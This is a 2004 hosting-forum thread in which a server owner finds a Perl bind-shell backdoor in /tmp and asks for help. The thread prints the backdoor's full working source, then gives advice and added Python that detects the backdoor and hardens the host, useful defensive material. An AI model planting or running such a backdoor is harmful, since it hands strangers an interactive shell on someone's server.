The Community Forums


Possible hack?

Discussion in 'General Discussion' started by numberonehost, Feb 19, 2004.

  1. numberonehost (Active Member, Norway)
    Found .bs.pl in /tmp with these contents:
    ----------------------------------------------
    #!/usr/bin/perl

    # * Author:
    # headflux (hf@synnergy.net)
    # Synnergy Networks (c) 1999, http://www.synnergy.net
    # *** Synnergy Networks

    use Socket;

    #rintf "BS\n";
    #lush();

    # Bind-shell settings: listen on TCP port 60021 on every interface and
    # hand each client a /bin/sh, preceded by a "(user@host:cwd)" banner.
    $port= 60021;
    $proto= getprotobyname('tcp');
    $cmd= "lpd";
    $system= 'echo "(`whoami`@`uname -n`:`pwd`)"; /bin/sh';

    # Overwrite argv[0] so the process shows up as "lpd" in ps, not as perl.
    $0 = $cmd;


    socket(SERVER, PF_INET, SOCK_STREAM, $proto)
    or die "socket:$!";

    # SO_REUSEADDR lets the backdoor rebind the port right after a restart.
    setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1))
    or die "setsockopt: $!";

    # INADDR_ANY: reachable from any network interface, not just localhost.
    bind(SERVER, sockaddr_in($port, INADDR_ANY))
    or die "bind: $!";

    listen(SERVER, SOMAXCONN)or die "listen: $!";

    # Serve clients one at a time, forever.
    for(; $paddr = accept(CLIENT, SERVER); close CLIENT)
    {
    # Duplicate the client socket onto stdin/stdout/stderr so the shell
    # reads commands from, and writes output to, the remote connection.
    open(STDIN, ">&CLIENT");
    open(STDOUT, ">&CLIENT");
    open(STDERR, ">&CLIENT");

    # Interactive shell, running as whatever user launched the script.
    system($system);

    close(STDIN);
    close(STDOUT);
    close(STDERR);
    }

    ----------------------------------------------

    Is this used to hack the server?

    I noticed mysql going "wild" on the server moments before I noticed this script. The load went above 100.

    wget is disabled on my server, so I was wondering how anyone can place this script in /tmp? It was owned by nobody.

    I would like to try the script in this thread: http://forums.cpanel.net/showthread.php?s=&threadid=11082
    in order to find the domain it was uploaded by. I tried the script but found no result as wget is already disabled on my server.

    If wget was not used to put it there, what else might have been used?

    Eivind
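    The script above leaves two artifacts on a running host: a listening socket on 60021 owned by the web server user, and a process whose argv[0] says "lpd" while /proc/PID/exe points at perl. The following Python checks for both. It is an added example, not part of the original thread; it runs on constructed samples in the layout of /proc/net/tcp and of a process listing, and the port allowlist, the pids and uid 99 for nobody are assumptions made for the sample.

```python
"""Find the footprint of a bind shell like .bs.pl on a Linux host.

Added example for this thread, not part of the original post. The inputs are
constructed samples in the layout of /proc/net/tcp and of a process listing
so the script runs offline; on a live host read the real files instead.
"""
import os
import socket
import struct
from dataclasses import dataclass

# Ports this cPanel host is expected to listen on (hypothetical allowlist).
EXPECTED_PORTS = {21, 22, 25, 53, 80, 110, 143, 443, 2082, 2083, 2086, 2087, 3306}

LISTEN_STATE = "0A"   # the 'st' column value for LISTEN in /proc/net/tcp

# Constructed /proc/net/tcp sample. Addresses are little-endian hex; the
# third row is the backdoor: 0.0.0.0:0xEA75 (60021) owned by uid 99 (nobody).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 0 100 0 0 10 0
   1: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000    27        0 1235 1 0 100 0 0 10 0
   2: 00000000:EA75 00000000:0000 0A 00000000:00000000 00:00000000 00000000    99        0 9876 1 0 100 0 0 10 0
   3: 0A000002:0050 0A000003:C2F1 01 00000000:00000000 00:00000000 00000000    99        0 9877 1 0 100 0 0 10 0
"""

# Constructed process listing: (pid, target of /proc/PID/exe, argv from
# /proc/PID/cmdline). Pid 2291 is the backdoor: $0 = "lpd" hides perl.
SAMPLE_PROCESSES = [
    (812, "/usr/sbin/sshd", ["/usr/sbin/sshd"]),
    (1407, "/usr/sbin/mysqld", ["/usr/sbin/mysqld", "--user=mysql"]),
    (2291, "/usr/bin/perl", ["lpd"]),
    (2302, "/bin/bash", ["-bash"]),   # login shell; the leading '-' is normal
]


@dataclass(frozen=True)
class Listener:
    ip: str
    port: int
    uid: int
    inode: int


def _decode_addr(field):
    """Turn '0100007F:0CEA' into ('127.0.0.1', 3306)."""
    hex_ip, hex_port = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(hex_ip, 16)))
    return ip, int(hex_port, 16)


def parse_listeners(proc_net_tcp):
    """All LISTEN sockets in a /proc/net/tcp dump."""
    found = []
    for line in proc_net_tcp.splitlines()[1:]:      # skip the header row
        f = line.split()
        if len(f) < 10 or f[3] != LISTEN_STATE:
            continue
        ip, port = _decode_addr(f[1])
        found.append(Listener(ip, port, int(f[7]), int(f[9])))
    return found


def unexpected_listeners(proc_net_tcp, expected=EXPECTED_PORTS):
    """Listeners on ports outside the allowlist; the inode ties back to a pid."""
    return [l for l in parse_listeners(proc_net_tcp) if l.port not in expected]


def disguised_processes(processes):
    """Pids whose argv[0] does not match the binary behind /proc/PID/exe.

    Heuristic: multi-call binaries (busybox) and symlinked shells also trip it,
    so treat hits as leads to inspect, not verdicts.
    """
    hits = []
    for pid, exe, argv in processes:
        shown = os.path.basename(argv[0]).lstrip("-") if argv else ""
        real = os.path.basename(exe)
        if shown != real:
            hits.append((pid, real, shown))
    return hits


if __name__ == "__main__":
    for l in unexpected_listeners(SAMPLE_PROC_NET_TCP):
        print(f"unexpected listener {l.ip}:{l.port} uid={l.uid} socket inode={l.inode}")
    for pid, real, shown in disguised_processes(SAMPLE_PROCESSES):
        print(f"pid {pid} runs {real} but calls itself {shown!r}")
```

    On a real host, the socket inode reported for an unexpected listener appears as a `socket:[9876]` link under some /proc/PID/fd/, which is how you get from the port to the process and from there to /proc/PID/cwd and /proc/PID/exe; killing the process before preserving that is what loses the trail the thread is asking about.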
     
  2. nybble (Well-Known Member)
    Read what the script is doing and you will know if it is a hack; it lists all the commands.

    And wget is not the only way to put things in /tmp
     
  3. numberonehost (Active Member, Norway)
    I'm asking because I only understand some of it, but not enough to determine how serious the script is. It seems that the script opens a TCP socket on port 60021. It determines which user it is run as, and on which machine and in which directory.

    Could you tell me more about what the script does?

    I know. That's why I'm asking. Could you mention one or two?

    Eivind
     
  4. jamesbond (Well-Known Member)
    lynx, curl, scp, ftp
     
  5. numberonehost (Active Member, Norway)
    Thanks jamesbond!

    Unfortunately I was unable to determine how this file got in /tmp using the script at http://forums.cpanel.net/showthread.php?s=&threadid=11082 with various tries (wget, scp, ftp, lynx, curl, bs.pl).

    Is there another way to find out where this file came from?

    Eivind
     
  6. nybble (Well-Known Member)
    Perhaps you should ask the server admin? :D
     
  7. Etheral (Well-Known Member)
    that really gives it away...
     
  8. nybble (Well-Known Member)
    From what I can see, it's a script to let someone else control your server, heh.
     
  9. Etheral (Well-Known Member)
    lol, basically
     
  10. numberonehost (Active Member, Norway)
    Thanks for your inputs guys!

    It seems as if it's impossible to find the source of this file, since I'm not running with php_suexec. If the file contents were downloaded from a file named file.txt by PHP, and PHP created the .bs.pl file in /tmp, then I have no means of finding out where the file came from or which account created this file?

    I have /tmp nosuid and noexec. I thought that it would not be possible to run a script in /tmp because of this. Am I mistaken? If I am, how can I prevent such a script from running in /tmp?

    I really hope someone has an answer to this.
     
  11. nybble (Well-Known Member)
    chown /tmp to "nobody"
    Run suexec, enable open_basedir protection and get a server admin.
     
  12. numberonehost (Active Member, Norway)
    What would chowning /tmp to nobody accomplish (pros/cons)?

    The others I've already done. I've done all the security tweaking that's normal (and not) in these forums and other forums (snort, logwatch, chkrootkit, ssh modifications, mod_security etc.).
     
  13. Ben (Well-Known Member)
    mount /tmp noexec

    More than anything else, the number one thing that will help you is to mount /tmp noexec, that, and run iptables or a similar firewall that will only allow incoming connections to certain ports and block all others.
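    Two caveats go with this advice. noexec on /tmp makes the kernel refuse to execute a file that lives on that mount directly, but `perl /tmp/.bs.pl` executes /usr/bin/perl, which then merely reads the file, so a noexec /tmp does not stop an interpreted script; that matches what numberonehost saw in post 10. The firewall, on the other hand, does stop this particular backdoor: with INPUT defaulting to DROP, nobody can reach port 60021 from outside, although an attacker who can already run code as nobody can still open an outbound (reverse) connection. The following Python audits both controls. It is an added example, not from the thread; the /proc/mounts text is constructed, and the device names and the port allowlist are assumptions.

```python
"""Check the two controls recommended in this thread: /tmp mounted with
noexec/nosuid/nodev, and a default-deny inbound firewall.

Added example, not from the thread. SAMPLE_PROC_MOUNTS is a constructed
/proc/mounts; ALLOWED_TCP_PORTS is a hypothetical allowlist for the host.
"""
REQUIRED_TMP_OPTS = {"noexec", "nosuid", "nodev"}
TMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
ALLOWED_TCP_PORTS = {21, 22, 25, 53, 80, 110, 143, 443, 2082, 2083, 2086, 2087}

# Constructed /proc/mounts: /tmp lacks nodev, /var/tmp is not a mount at all.
SAMPLE_PROC_MOUNTS = """\
/dev/sda1 / ext3 rw 0 0
/dev/sda3 /tmp ext3 rw,nosuid,noexec 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev,noexec 0 0
none /proc proc rw 0 0
"""


def parse_mounts(text):
    """Map mount point -> set of options from /proc/mounts text."""
    mounts = {}
    for line in text.splitlines():
        f = line.split()
        if len(f) >= 4:
            mounts[f[1]] = set(f[3].split(","))
    return mounts


def tmp_mount_findings(proc_mounts, dirs=TMP_DIRS, required=REQUIRED_TMP_OPTS):
    """Writable scratch directories that are not hardened, with the reason."""
    mounts = parse_mounts(proc_mounts)
    findings = {}
    for d in dirs:
        if d not in mounts:
            findings[d] = "not a separate mount, so it inherits the parent's options"
            continue
        missing = sorted(required - mounts[d])
        if missing:
            findings[d] = "missing " + ",".join(missing)
    return findings


def fstab_line(device, mount_point, fstype="ext3"):
    """The /etc/fstab entry that gives a mount the full set of options."""
    opts = "defaults," + ",".join(sorted(REQUIRED_TMP_OPTS))
    return f"{device} {mount_point} {fstype} {opts} 0 0"


def iptables_rules(allowed_tcp_ports):
    """Default-deny INPUT that opens only the allowlisted TCP ports.

    OUTPUT stays ACCEPT, so this blocks inbound connects to a bind shell on
    60021 but not an outbound (reverse) shell started by the same attacker.
    """
    rules = [
        "iptables -P INPUT DROP",
        "iptables -P FORWARD DROP",
        "iptables -P OUTPUT ACCEPT",
        "iptables -A INPUT -i lo -j ACCEPT",
        "iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT",
    ]
    for port in sorted(allowed_tcp_ports):
        rules.append(
            f"iptables -A INPUT -p tcp --dport {port} -m conntrack --ctstate NEW -j ACCEPT"
        )
    return rules


def inbound_port_open(rules, port):
    """True if the generated rule set accepts new connections to this port."""
    return any(f"--dport {port} " in r and "-j ACCEPT" in r for r in rules)


if __name__ == "__main__":
    for d, why in tmp_mount_findings(SAMPLE_PROC_MOUNTS).items():
        print(f"{d}: {why}")
    print(fstab_line("/dev/sda3", "/tmp"))
    print("\n".join(iptables_rules(ALLOWED_TCP_PORTS)))
```

    Run the first part against the real /proc/mounts to see whether /var/tmp and /dev/shm got the same treatment as /tmp; an attacker who finds /tmp locked down simply drops the file in the next world-writable directory. The rule list is meant to be reviewed and then applied with a rule-saving mechanism your distribution supports, not pasted blindly over an existing firewall.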
     